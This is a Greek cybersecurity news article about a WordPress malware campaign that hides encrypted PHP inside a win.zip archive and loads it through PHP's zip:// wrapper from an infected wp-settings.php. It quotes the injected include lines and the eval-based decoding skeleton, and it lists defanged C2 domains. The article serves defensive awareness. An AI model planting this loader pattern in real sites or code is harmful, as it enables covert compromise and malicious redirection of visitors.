Mastodon
Connect with us

Κυβερνοασφάλεια

Πώς οι επιτιθέμενοι εκμεταλλεύονται το WordPress για κακόβουλες ανακατευθύνσεις

Κυβερνοασφάλεια

Η εισβολή της Enterprise AI: Μια σύγχρονη επιτήρηση

Κυβερνοασφάλεια

Οι επιθέσεις Jingle Thief: Η νέα απειλή στις ψηφιακές κάρτες δώρων

Κυβερνοασφάλεια

Πώς οι επιτιθέμενοι εκμεταλλεύονται το WordPress για κακόβουλες ανακατευθύνσεις

Εξελιγμένη καμπάνια κακόβουλου λογισμικού εκμεταλλεύεται το WordPress για ανακατευθύνσεις σε κακόβουλους ιστότοπους.

Published

9 months ago

on

Πώς οι επιτιθέμενοι εκμεταλλεύονται το WordPress για κακόβουλες ανακατευθύνσεις

Περιεχόμενα
Η νέα απειλή για τις ιστοσελίδες WordPress
Η εξέλιξη των διαδικτυακών απειλών
Η επίθεση στο wp-settings.php
Μέθοδος απόκρυψης και παραμονής
Διαχωρισμός ανθρώπων και bots
Δυναμική επιλογή Command and Control
Η καινοτομία της συμπερίληψης αρχείων ZIP
Παράκαμψη παραδοσιακών μεθόδων ανίχνευσης
Ανθεκτικότητα και στοχευμένη παράδοση περιεχομένου

Η νέα απειλή για τις ιστοσελίδες WordPress

Οι ερευνητές στον τομέα της κυβερνοασφάλειας έχουν ανακαλύψει μια εξελιγμένη καμπάνια κακόβουλου λογισμικού που στοχεύει ιστοσελίδες WordPress. Αυτή η επίθεση βασίζεται σε μια ευφυή μέθοδο που χρησιμοποιεί αρχεία ZIP για να παρακάμψει τα παραδοσιακά συστήματα ασφαλείας και να ανακατευθύνει ανυποψίαστους επισκέπτες σε κακόβουλους ιστότοπους.

Η εξέλιξη των διαδικτυακών απειλών

Η συγκεκριμένη επίθεση, η οποία αναφέρθηκε για πρώτη φορά τον Ιούλιο του 2025, αποτελεί μια σημαντική εξέλιξη στις διαδικτυακές απειλές. Χρησιμοποιεί προηγμένες τεχνικές απόκρυψης και μεθόδους διαρκούς παρουσίας για να επιτύχει τους στόχους της. Οι χρήστες που επισκέπτονται τις μολυσμένες ιστοσελίδες κατευθύνονται σε κακόβουλους τομείς, ενώ ταυτόχρονα διεξάγονται επιχειρήσεις δηλητηρίασης των αποτελεσμάτων μηχανών αναζήτησης.

Η επίθεση στο wp-settings.php

Η επίθεση ξεκινά με την παραβίαση των βασικών αρχείων του WordPress, με κύριο στόχο το κρίσιμο αρχείο wp-settings.php. Μόλις αποκτηθεί πρόσβαση, οι επιτιθέμενοι εισάγουν κακόβουλο κώδικα που εκμεταλλεύεται τη λειτουργικότητα του PHP zip:// για να εκτελέσει κρυφά φορτία.

Μέθοδος απόκρυψης και παραμονής

Αυτή η μέθοδος επιτρέπει στο κακόβουλο λογισμικό να παραμένει σχεδόν αόρατο από τους παραδοσιακούς σαρωτές ασφαλείας, καθώς ο κακόβουλος κώδικας αποθηκεύεται μέσα σε ένα φαινομενικά αθώο αρχείο ZIP με το όνομα win.zip. Οι στόχοι του κακόβουλου λογισμικού δεν περιορίζονται μόνο σε απλές ανακατευθύνσεις. Οργανώνει μια ολοκληρωμένη επίθεση στις κατατάξεις μηχανών αναζήτησης μέσω μη εξουσιοδοτημένης έγχυσης περιεχομένου, χειραγώγησης των sitemap και δημιουργίας σελίδων γεμάτων με spam για την προώθηση κακόβουλων ιστοσελίδων στα αποτελέσματα αναζήτησης.

Διαχωρισμός ανθρώπων και bots

Η μόλυνση παρουσιάζει αξιοσημείωτη πολυπλοκότητα στην ικανότητά της να διαφοροποιεί τους ανθρώπινους επισκέπτες από τα αυτοματοποιημένα bots. Έτσι, οι ανιχνευτές μηχανών αναζήτησης συναντούν αθώο περιεχόμενο, ενώ οι πραγματικοί χρήστες υπόκεινται σε κακόβουλες ανακατευθύνσεις. Οι αναλυτές της Sucuri εντόπισαν το κακόβουλο λογισμικό μετά από έρευνα για επίμονες ανακατευθύνσεις που ανέφερε ένας πελάτης, οδηγώντας στην ανακάλυψη αυτής της πολυεπίπεδης απειλής.

Δυναμική επιλογή Command and Control

Οι ερευνητές σημείωσαν ότι το κακόβουλο λογισμικό χρησιμοποιεί δυναμική επιλογή διακομιστών Command and Control (C2), με διαφορετικούς C2 τομείς να ενεργοποιούνται ανάλογα με τα συγκεκριμένα πρότυπα URL που επισκέπτονται οι χρήστες.

Η καινοτομία της συμπερίληψης αρχείων ZIP

Η πιο καινοτόμος πτυχή του κακόβουλου λογισμικού είναι η εκμετάλλευση του PHP zip:// stream wrapper για την συμπερίληψη κώδικα. Το αρχικό φορτίο, που εισάγεται στο wp-settings.php, περιέχει δύο κρίσιμες γραμμές που δημιουργούν το πλαίσιο της μόλυνσης:

$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);
include('zip://win.zip#' . $h);

Αυτός ο κώδικας εξάγει το όνομα τομέα από την κεφαλίδα HTTP_HOST και το χρησιμοποιεί για να συμπεριλάβει ένα αρχείο απευθείας από το αρχείο win.zip.

Παράκαμψη παραδοσιακών μεθόδων ανίχνευσης

Η τεχνική παρακάμπτει τις παραδοσιακές μεθόδους ανίχνευσης αρχείων, καθώς ο κακόβουλος κώδικας βρίσκεται μέσα σε ένα συμπιεσμένο κοντέινερ και όχι ως ανεξάρτητα αρχεία PHP. Κατά την εξαγωγή, το αρχείο ZIP αποκαλύπτει έντονα κρυπτογραφημένο κώδικα PHP, δομημένο ως εξής:

$encode=$b3($string);
$string1=$b2($b4($encode));
echo eval("?>" . $string1);

Το κακόβουλο λογισμικό διατηρεί την παρουσία του μέσω της χειραγώγησης του περιβάλλοντος, θέτοντας εκτεταμένα χρονικά όρια εκτέλεσης και εφαρμόζοντας μηχανισμούς ανίχνευσης κατά των bots.

Ανθεκτικότητα και στοχευμένη παράδοση περιεχομένου

Επιλέγει δυναμικά από πολλαπλούς διακομιστές Command and Control, συμπεριλαμβανομένων τομέων όπως οι wditemqy[.]enturbioaj[.]xyz και oqmetrix[.]icercanokt[.]xyz, ανάλογα με την διαδρομή URL που ζητείται. Αυτή η κατανεμημένη αρχιτεκτονική C2 ενισχύει την ανθεκτικότητα του κακόβουλου λογισμικού απέναντι σε προσπάθειες κατάργησης, ενώ επιτρέπει στοχευμένη παράδοση περιεχομένου βάσει συμπεριφορών των επισκεπτών.

Related Topics:
Advertisement